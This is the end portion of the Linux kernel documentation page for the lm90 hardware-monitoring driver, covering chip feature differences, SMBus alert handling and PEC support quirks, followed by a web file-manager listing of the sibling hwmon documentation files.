<li><p>Extended resolution only available when conversion rate &lt;= 1 Hz</p></li>
</ul>
</dd>
<dt>MAX6657 and MAX6658:</dt><dd><ul class="simple">
<li><p>Better local resolution</p></li>
<li><p>Remote sensor type selection</p></li>
</ul>
</dd>
<dt>MAX6659:</dt><dd><ul class="simple">
<li><p>Better local resolution</p></li>
<li><p>Selectable address</p></li>
<li><p>Second critical temperature limit</p></li>
<li><p>Remote sensor type selection</p></li>
</ul>
</dd>
<dt>MAX6680 and MAX6681:</dt><dd><ul class="simple">
<li><p>Selectable address</p></li>
<li><p>Remote sensor type selection</p></li>
</ul>
</dd>
<dt>MAX6695 and MAX6696:</dt><dd><ul class="simple">
<li><p>Better local resolution</p></li>
<li><p>Selectable address (max6696)</p></li>
<li><p>Second critical temperature limit</p></li>
<li><p>Two remote sensors</p></li>
</ul>
</dd>
<dt>W83L771W/G</dt><dd><ul class="simple">
<li><p>The G variant is lead-free, otherwise similar to the W.</p></li>
<li><p>Filter and alert configuration register at 0xBF</p></li>
<li><p>Moving average (depending on conversion rate)</p></li>
</ul>
</dd>
<dt>W83L771AWG/ASG</dt><dd><ul class="simple">
<li><p>Successor of the W83L771W/G, same features.</p></li>
<li><p>The AWG and ASG variants only differ in package format.</p></li>
<li><p>Diode ideality factor configuration (remote sensor) at 0xE3</p></li>
</ul>
</dd>
<dt>NCT7716:</dt><dd><ul class="simple">
<li><p>8 bit sensor resolution</p></li>
<li><p>Selectable address</p></li>
<li><p>Configurable conversion rate</p></li>
</ul>
</dd>
<dt>NCT7717:</dt><dd><ul class="simple">
<li><p>8 bit sensor resolution</p></li>
<li><p>Configurable conversion rate</p></li>
</ul>
</dd>
<dt>NCT7718:</dt><dd><ul class="simple">
<li><p>Temperature offset register for remote temperature sensor</p></li>
<li><p>11 bit resolution for remote temperature sensor</p></li>
<li><p>Low temperature limits</p></li>
<li><p>Configurable conversion rate</p></li>
</ul>
</dd>
<dt>SA56004X:</dt><dd><ul class="simple">
<li><p>Better local resolution</p></li>
</ul>
</dd>
</dl>
<p>All temperature values are given in degrees Celsius. Resolution
is 1.0 degree for the local temperature, 0.125 degree for the remote
temperature, except for the MAX6654, MAX6657, MAX6658 and MAX6659 which have
a resolution of 0.125 degree for both temperatures.</p>
<p>Each sensor has its own high and low limits, plus a critical limit.
Additionally, there is a relative hysteresis value common to both critical
values. To make life easier to user-space applications, two absolute values
are exported, one for each channel, but these values are of course linked.
Only the local hysteresis can be set from user-space, and the same delta
applies to the remote hysteresis.</p>
<p>The lm90 driver will not update its values more frequently than configured with
the update_interval attribute; reading them more often will do no harm, but will
return ‘old’ values.</p>
</section>
<section id="smbus-alert-support">
<h2>SMBus Alert Support<a class="headerlink" href="#smbus-alert-support" title="Link to this heading">¶</a></h2>
<p>This driver has basic support for SMBus alert. When an alert is received,
the status register is read and the faulty temperature channel is logged.</p>
<p>The Analog Devices chips (ADM1032, ADT7461 and ADT7461A) and ON
Semiconductor chips (NCT1008) do not implement the SMBus alert protocol
properly so additional care is needed: the ALERT output is disabled when
an alert is received, and is re-enabled only when the alarm is gone.
Otherwise the chip would block alerts from other chips in the bus as long
as the alarm is active.</p>
</section>
<section id="pec-support">
<h2>PEC Support<a class="headerlink" href="#pec-support" title="Link to this heading">¶</a></h2>
<p>The ADM1032 is the only chip of the family which supports PEC. It does
not support PEC on all transactions though, so some care must be taken.</p>
<p>When reading a register value, the PEC byte is computed and sent by the
ADM1032 chip. However, in the case of a combined transaction (SMBus Read
Byte), the ADM1032 computes the CRC value over only the second half of
the message rather than its entirety, because it thinks the first half
of the message belongs to a different transaction. As a result, the CRC
value differs from what the SMBus master expects, and all reads fail.</p>
<p>For this reason, the lm90 driver will enable PEC for the ADM1032 only if
the bus supports the SMBus Send Byte and Receive Byte transaction types.
These transactions will be used to read register values, instead of
SMBus Read Byte, and PEC will work properly.</p>
<p>Additionally, the ADM1032 doesn’t support SMBus Send Byte with PEC.
Instead, it will try to write the PEC value to the register (because the
SMBus Send Byte transaction with PEC is similar to a Write Byte transaction
without PEC), which is not what we want. Thus, PEC is explicitly disabled
on SMBus Send Byte transactions in the lm90 driver.</p>
<p>PEC on byte data transactions represents a significant increase in bandwidth
usage (+33% for writes, +25% for reads) in normal conditions. With the need
to use two SMBus transaction for reads, this overhead jumps to +50%. Worse,
two transactions will typically mean twice as much delay waiting for
transaction completion, effectively doubling the register cache refresh time.
I guess reliability comes at a price, but it’s quite expensive this time.</p>
<p>So, as not everyone might enjoy the slowdown, PEC is disabled by default and
can be enabled through sysfs. Just write 1 to the “pec” file and PEC will be
enabled. Write 0 to that file to disable PEC again.</p>
</section>
</section>


          </div>
          
        </div>
      </div>
    <div class="clearer"></div>
  </div>
    <div class="footer">
      &#169;The kernel development community.
      
      |
      Powered by <a href="https://www.sphinx-doc.org/">Sphinx 8.1.3</a>
      &amp; <a href="https://alabaster.readthedocs.io">Alabaster 0.7.16</a>
      
      |
      <a href="../_sources/hwmon/lm90.rst.txt"
          rel="nofollow">Page source</a>
    </div>

    

    
  </body>
</html>

Filemanager

Name Type Size Permission Actions
abituguru-datasheet.html File 26.68 KB 0644
abituguru.html File 15.9 KB 0644
abituguru3.html File 13.22 KB 0644
acbel-fsg032.html File 15.21 KB 0644
acpi_power_meter.html File 13.5 KB 0644
ad7314.html File 10.6 KB 0644
adc128d818.html File 11.87 KB 0644
adm1025.html File 12.58 KB 0644
adm1026.html File 15.18 KB 0644
adm1031.html File 11.54 KB 0644
adm1177.html File 11.3 KB 0644
adm1266.html File 11.3 KB 0644
adm1275.html File 17.55 KB 0644
adm9240.html File 20.36 KB 0644
adp1050.html File 17.63 KB 0644
ads7828.html File 13.04 KB 0644
adt7410.html File 14.54 KB 0644
adt7411.html File 11.78 KB 0644
adt7462.html File 12.64 KB 0644
adt7470.html File 13.41 KB 0644
adt7475.html File 16.93 KB 0644
aht10.html File 12.57 KB 0644
amc6821.html File 16.08 KB 0644
aquacomputer_d5next.html File 16.03 KB 0644
asb100.html File 13.39 KB 0644
asc7621.html File 24.1 KB 0644
aspeed-g6-pwm-tach.html File 10.78 KB 0644
aspeed-pwm-tacho.html File 10.78 KB 0644
asus_ec_sensors.html File 13.52 KB 0644
asus_rog_ryujin.html File 12.03 KB 0644
asus_wmi_sensors.html File 12.89 KB 0644
bcm54140.html File 11.91 KB 0644
bel-pfe.html File 15.42 KB 0644
bpa-rs600.html File 14.13 KB 0644
bt1-pvt.html File 16.6 KB 0644
cgbc-hwmon.html File 13.48 KB 0644
chipcap2.html File 13.5 KB 0644
coretemp.html File 16.79 KB 0644
corsair-cpro.html File 12 KB 0644
corsair-psu.html File 14.95 KB 0644
cros_ec_hwmon.html File 10.88 KB 0644
crps.html File 15.73 KB 0644
da9052.html File 13.36 KB 0644
da9055.html File 12.06 KB 0644
dell-smm-hwmon.html File 36.04 KB 0644
dme1737.html File 29.23 KB 0644
dps920ab.html File 13.39 KB 0644
drivetemp.html File 12.77 KB 0644
ds1621.html File 19.05 KB 0644
ds620.html File 11.6 KB 0644
emc1403.html File 14.21 KB 0644
emc2103.html File 11.24 KB 0644
emc2305.html File 11.53 KB 0644
emc6w201.html File 11.42 KB 0644
f71805f.html File 20.18 KB 0644
f71882fg.html File 16.01 KB 0644
fam15h_power.html File 14.9 KB 0644
fsp-3y.html File 10.98 KB 0644
ftsteutates.html File 11.64 KB 0644
g760a.html File 11.34 KB 0644
g762.html File 13.02 KB 0644
gigabyte_waterforce.html File 11.62 KB 0644
gl518sm.html File 13.75 KB 0644
gpd-fan.html File 12.9 KB 0644
gsc-hwmon.html File 11.98 KB 0644
gxp-fan-ctrl.html File 10.83 KB 0644
hih6130.html File 11.49 KB 0644
hp-wmi-sensors.html File 24.2 KB 0644
hs3001.html File 11.22 KB 0644
htu31.html File 11.07 KB 0644
hwmon-kernel-api.html File 28.79 KB 0644
ibm-cffps.html File 13.18 KB 0644
ibmaem.html File 11.37 KB 0644
ibmpowernv.html File 14.41 KB 0644
ina209.html File 16.13 KB 0644
ina233.html File 11.77 KB 0644
ina238.html File 14.77 KB 0644
ina2xx.html File 17.9 KB 0644
ina3221.html File 13.69 KB 0644
index.html File 37.21 KB 0644
inspur-ipsps1.html File 14.74 KB 0644
intel-m10-bmc-hwmon.html File 14.19 KB 0644
ir35221.html File 15.37 KB 0644
ir36021.html File 12.94 KB 0644
ir38064.html File 15.22 KB 0644
isl28022.html File 12.44 KB 0644
isl68137.html File 33.94 KB 0644
it87.html File 24.03 KB 0644
jc42.html File 17.9 KB 0644
k10temp.html File 16.25 KB 0644
k8temp.html File 12.42 KB 0644
kbatt.html File 12.63 KB 0644
kfan.html File 11.48 KB 0644
lan966x.html File 11.02 KB 0644
lineage-pem.html File 13.77 KB 0644
lm25066.html File 16.43 KB 0644
lm63.html File 13.88 KB 0644
lm70.html File 12.7 KB 0644
lm73.html File 13.67 KB 0644
lm75.html File 17.08 KB 0644
lm77.html File 11.65 KB 0644
lm78.html File 13.54 KB 0644
lm80.html File 13.16 KB 0644
lm83.html File 14.24 KB 0644
lm85.html File 24.3 KB 0644
lm87.html File 14.23 KB 0644
lm90.html File 34.77 KB 0644
lm92.html File 11.65 KB 0644
lm93.html File 28.68 KB 0644
lm95234.html File 11.89 KB 0644
lm95245.html File 11.91 KB 0644
lochnagar.html File 16.38 KB 0644
lt3074.html File 13.86 KB 0644
lt7182s.html File 15.07 KB 0644
ltc2945.html File 15.06 KB 0644
ltc2947.html File 16.58 KB 0644
ltc2978.html File 28.01 KB 0644
ltc2990.html File 12.56 KB 0644
ltc2991.html File 11.45 KB 0644
ltc2992.html File 12.07 KB 0644
ltc3815.html File 13.16 KB 0644
ltc4151.html File 11.71 KB 0644
ltc4215.html File 12.15 KB 0644
ltc4245.html File 15.68 KB 0644
ltc4260.html File 12.48 KB 0644
ltc4261.html File 13 KB 0644
ltc4282.html File 18.76 KB 0644
ltc4286.html File 14.5 KB 0644
max127.html File 11.59 KB 0644
max15301.html File 14.49 KB 0644
max16064.html File 13.91 KB 0644
max16065.html File 15 KB 0644
max1619.html File 10.96 KB 0644
max16601.html File 16.95 KB 0644
max1668.html File 14.54 KB 0644
max197.html File 13.01 KB 0644
max20730.html File 13.58 KB 0644
max20751.html File 14.47 KB 0644
max31722.html File 11.4 KB 0644
max31730.html File 12.02 KB 0644
max31760.html File 14.62 KB 0644
max31785.html File 13.5 KB 0644
max31790.html File 11.95 KB 0644
max31827.html File 16.18 KB 0644
max34440.html File 20.08 KB 0644
max6620.html File 12.25 KB 0644
max6639.html File 13.79 KB 0644
max6650.html File 13.6 KB 0644
max6697.html File 13.71 KB 0644
max77705.html File 11.3 KB 0644
max8688.html File 14.73 KB 0644
mc13783-adc.html File 16.1 KB 0644
mc33xs2410_hwmon.html File 11.34 KB 0644
mc34vr500.html File 10.93 KB 0644
mcp3021.html File 11.22 KB 0644
menf21bmc.html File 12.3 KB 0644
mlxreg-fan.html File 13.61 KB 0644
mp2856.html File 12.53 KB 0644
mp2869.html File 13.21 KB 0644
mp2888.html File 12.85 KB 0644
mp2891.html File 13.56 KB 0644
mp29502.html File 11.78 KB 0644
mp2975.html File 13.89 KB 0644
mp2993.html File 13.09 KB 0644
mp5023.html File 11.76 KB 0644
mp5920.html File 12 KB 0644
mp5990.html File 12.21 KB 0644
mp9941.html File 12.04 KB 0644
mpq8785.html File 13.29 KB 0644
nct6683.html File 13.44 KB 0644
nct6775.html File 20.68 KB 0644
nct7363.html File 10.92 KB 0644
nct7802.html File 11.09 KB 0644
nct7904.html File 12.28 KB 0644
npcm750-pwm-fan.html File 10.81 KB 0644
nsa320.html File 12.52 KB 0644
ntc_thermistor.html File 13.62 KB 0644
nzxt-kraken2.html File 11.3 KB 0644
nzxt-kraken3.html File 13.52 KB 0644
nzxt-smart2.html File 12.82 KB 0644
occ.html File 15.87 KB 0644
pc87360.html File 19.92 KB 0644
pc87427.html File 12.16 KB 0644
pcf8591.html File 14.52 KB 0644
peci-cputemp.html File 14.53 KB 0644
peci-dimmtemp.html File 12.32 KB 0644
pim4328.html File 13.98 KB 0644
pli1209bc.html File 14.36 KB 0644
pm6764tr.html File 11.08 KB 0644
pmbus-core.html File 30.88 KB 0644
pmbus.html File 22.6 KB 0644
powerz.html File 10.62 KB 0644
powr1220.html File 12.13 KB 0644
pt5161l.html File 11.44 KB 0644
pwm-fan.html File 11.32 KB 0644
pxe1610.html File 14.53 KB 0644
q54sj108a2.html File 12.59 KB 0644
qnap-mcu-hwmon.html File 10.93 KB 0644
raspberrypi-hwmon.html File 10.78 KB 0644
sa67.html File 11.22 KB 0644
sbrmi.html File 13.84 KB 0644
sbtsi_temp.html File 11.55 KB 0644
sch5627.html File 11.61 KB 0644
sch5636.html File 11.21 KB 0644
scpi-hwmon.html File 11.21 KB 0644
sfctemp.html File 11.36 KB 0644
sg2042-mcu.html File 13.79 KB 0644
sht15.html File 13.29 KB 0644
sht21.html File 12.49 KB 0644
sht3x.html File 16.75 KB 0644
sht4x.html File 12.54 KB 0644
shtc1.html File 12.17 KB 0644
sis5595.html File 15.93 KB 0644
sl28cpld.html File 10.99 KB 0644
smpro-hwmon.html File 17.47 KB 0644
smsc47b397.html File 17.76 KB 0644
smsc47m1.html File 13.48 KB 0644
smsc47m192.html File 15.33 KB 0644
sparx5-temp.html File 10.78 KB 0644
spd5118.html File 12.65 KB 0644
stpddc60.html File 14.72 KB 0644
submitting-patches.html File 18.13 KB 0644
surface_fan.html File 10.81 KB 0644
sy7636a-hwmon.html File 10.54 KB 0644
sysfs-interface.html File 33.24 KB 0644
tc654.html File 11.39 KB 0644
tc74.html File 10.26 KB 0644
thmc50.html File 13.73 KB 0644
tmp102.html File 11.06 KB 0644
tmp103.html File 11 KB 0644
tmp108.html File 11.69 KB 0644
tmp401.html File 12.84 KB 0644
tmp421.html File 12.34 KB 0644
tmp464.html File 12.1 KB 0644
tmp513.html File 13.12 KB 0644
tps23861.html File 11.62 KB 0644
tps25990.html File 13.11 KB 0644
tps40422.html File 13.53 KB 0644
tps53679.html File 16.9 KB 0644
tps546d24.html File 10.92 KB 0644
twl4030-madc-hwmon.html File 12.17 KB 0644
ucd9000.html File 18.11 KB 0644
ucd9200.html File 17.95 KB 0644
userspace-tools.html File 11.72 KB 0644
vexpress.html File 11.72 KB 0644
via686a.html File 14.43 KB 0644
vt1211.html File 23.42 KB 0644
w83627ehf.html File 20.55 KB 0644
w83627hf.html File 16.17 KB 0644
w83773g.html File 11.21 KB 0644
w83781d.html File 34.02 KB 0644
w83791d.html File 20.51 KB 0644
w83792d.html File 19.1 KB 0644
w83793.html File 14.85 KB 0644
w83795.html File 21.88 KB 0644
w83l785ts.html File 11.73 KB 0644
w83l786ng.html File 12.22 KB 0644
wm831x.html File 11.66 KB 0644
wm8350.html File 11.19 KB 0644
xdp710.html File 11.9 KB 0644
xdpe12284.html File 12.85 KB 0644
xdpe152c4.html File 12.98 KB 0644
xgene-hwmon.html File 11.13 KB 0644
zl6100.html File 21.7 KB 0644
Filemanager